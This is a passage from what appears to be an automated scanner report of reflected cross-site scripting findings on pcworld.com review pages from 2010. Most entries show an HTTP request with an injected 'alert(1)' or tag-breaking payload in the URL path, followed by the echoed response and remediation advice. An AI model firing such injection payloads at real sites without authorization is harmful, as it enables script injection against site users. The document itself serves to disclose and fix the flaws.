The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a7b"><a>97021eacf98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1674/top_10_color_laser_printers.html49a7b"><a>97021eacf98 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0C421483EBF86E7A61BAF73B4D6E5FB6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:37 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
rld.com/pixel.gif?ad=pcw.main.reviews/products/printers/chart;pg=chart;c=2106;c=2106;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&amp;url=/reviews/collection/1674/top_10_color_laser_printers.html49a7b"><a>97021eacf98"/>
...[SNIP]...

1.125. http://www.pcworld.com/reviews/collection/1675/top_10_inkjet_multifunction_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1675/top_10_inkjet_multifunction_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f51b1'-alert(1)-'214faa0a304 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1675/top_10_inkjet_multifunction_printers.htmlf51b1'-alert(1)-'214faa0a304 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1675/top_10_inkjet_multifunction_printers.htmlf51b1'-alert(1)-'214faa0a304';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.126. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /reviews/collection/1676/top_10_monochrome_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee2e8"><a>6cba2334edc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1676/top_10_monochrome_laser_printers.htmlee2e8"><a>6cba2334edc HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D29A81E5116ECE8DCD3DA2043E62FB58; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:22 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
om/pixel.gif?ad=pcw.main.reviews/products/printers/chart;pg=chart;c=2106;c=2106;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&amp;url=/reviews/collection/1676/top_10_monochrome_laser_printers.htmlee2e8"><a>6cba2334edc"/>
...[SNIP]...

1.127. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1676/top_10_monochrome_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37d0e'-alert(1)-'a88398ab77d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1676/top_10_monochrome_laser_printers.html37d0e'-alert(1)-'a88398ab77d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:38 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1676/top_10_monochrome_laser_printers.html37d0e'-alert(1)-'a88398ab77d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.128. http://www.pcworld.com/reviews/collection/1677/top_5_snapshot_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1677/top_5_snapshot_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62b4e'-alert(1)-'5ed55415157 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1677/top_5_snapshot_printers.html62b4e'-alert(1)-'5ed55415157 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1677/top_5_snapshot_printers.html62b4e'-alert(1)-'5ed55415157';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.129. http://www.pcworld.com/reviews/collection/1678/top_stereo_bluetooth_headsets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1678/top_stereo_bluetooth_headsets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceca0'-alert(1)-'3abb31f0457 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1678/top_stereo_bluetooth_headsets.htmlceca0'-alert(1)-'3abb31f0457 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4DCDC94C1A16ED397CBA39FE3129CE11; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:31 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1678/top_stereo_bluetooth_headsets.htmlceca0'-alert(1)-'3abb31f0457';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.130. http://www.pcworld.com/reviews/collection/1680/top_5_solidstate_drives.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1680/top_5_solidstate_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb738'-alert(1)-'0ca9dc1da8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1680/top_5_solidstate_drives.htmleb738'-alert(1)-'0ca9dc1da8d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E60E2C61FB31841BF5AC7EB4659B7CE4; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:24 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1680/top_5_solidstate_drives.htmleb738'-alert(1)-'0ca9dc1da8d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.131. http://www.pcworld.com/reviews/collection/1681/top_sync_services.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1681/top_sync_services.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac5c'-alert(1)-'57fbfb9b01 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1681/top_sync_services.htmlbac5c'-alert(1)-'57fbfb9b01 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4F3B1CDEE8F6D14E0C5D37DD9464B39E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:57 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1681/top_sync_services.htmlbac5c'-alert(1)-'57fbfb9b01';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.132. http://www.pcworld.com/reviews/collection/1683/top_hd_camcorders.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1683/top_hd_camcorders.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5549'-alert(1)-'44108223ee7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1683/top_hd_camcorders.htmle5549'-alert(1)-'44108223ee7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:13 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1683/top_hd_camcorders.htmle5549'-alert(1)-'44108223ee7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.133. http://www.pcworld.com/reviews/collection/1685/top_rated_megazoom_cameras.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1685/top_rated_megazoom_cameras.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4613'-alert(1)-'33673fbb557 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1685/top_rated_megazoom_cameras.htmlf4613'-alert(1)-'33673fbb557 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8435514F3462B22DB218FB9C8F47E80D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:42 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1685/top_rated_megazoom_cameras.htmlf4613'-alert(1)-'33673fbb557';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.134. http://www.pcworld.com/reviews/collection/1705/top_pocket_megazooms.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1705/top_pocket_megazooms.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a3a'-alert(1)-'4f154188b71 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1705/top_pocket_megazooms.htmlb2a3a'-alert(1)-'4f154188b71 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=96E2908A0DB39E4CE553D91D0FDCCE15; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:06 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1705/top_pocket_megazooms.htmlb2a3a'-alert(1)-'4f154188b71';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.135. http://www.pcworld.com/reviews/collection/1985/.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1985/.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4cd'-alert(1)-'901885d8a62 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1985/.html3a4cd'-alert(1)-'901885d8a62 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:24 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1985/.html3a4cd'-alert(1)-'901885d8a62';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.136. http://www.pcworld.com/reviews/collection/3146/top_mainstream_pcs.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/3146/top_mainstream_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2042'-alert(1)-'08e3df2e1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/3146/top_mainstream_pcs.htmlc2042'-alert(1)-'08e3df2e1d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4434053ED8A01F4DF74DFC1123D790CC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:05 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Cookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/3146/top_mainstream_pcs.htmlc2042'-alert(1)-'08e3df2e1d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.137. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/299836/review/lexmark_platinum_pro905.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203a1'-alert(1)-'8ce5798dba8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/299836/review203a1'-alert(1)-'8ce5798dba8/lexmark_platinum_pro905.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:08:16 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=CA9039D7CE2A8B068F9A5975E568D5C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:16 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/299836/review203a1'-alert(1)-'8ce5798dba8/lexmark_platinum_pro905.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docu
...[SNIP]...

1.138. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/299836/review/lexmark_platinum_pro905.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c27'-alert(1)-'4fc192ab0d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/299836/review/lexmark_platinum_pro905.htmla7c27'-alert(1)-'4fc192ab0d9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:19 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/299836/review/lexmark_platinum_pro905.htmla7c27'-alert(1)-'4fc192ab0d9';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.139. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/412265/review/canon_pixma_mx870.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ed1'-alert(1)-'7f87a47127 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/412265/review95ed1'-alert(1)-'7f87a47127/canon_pixma_mx870.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:07:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FCC3B6E618260E21652DC80BFF7B6A87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:51 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
